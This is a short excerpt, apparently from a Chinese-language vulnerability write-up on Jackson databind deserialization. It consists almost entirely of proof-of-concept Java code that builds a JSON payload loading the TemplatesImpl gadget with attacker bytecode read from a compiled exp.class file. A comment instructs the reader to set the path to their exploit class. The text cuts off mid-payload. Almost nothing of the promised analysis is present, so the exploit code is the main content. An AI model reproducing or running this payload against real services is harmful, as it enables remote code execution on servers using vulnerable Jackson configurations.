1. JACKSON漏洞解析
poc代码:main.java
import com.fasterxml.jackson.databind.ObjectMapper;import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;import org.springframework.util.FileCopyUtils;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.FileInputStream;import java.io.IOException;/**
* Created by Administrator on 2017/6/12. */public class main { public static void main(String[] args) {
String MASIT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";//改成exp存在的绝对路径
String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class");
String jsonInput = aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" +
"{\n" +
"'transletBytecodes':['"+exp+"'],\n" +
"'transletName':'p',\n" +
"'outputProperties':
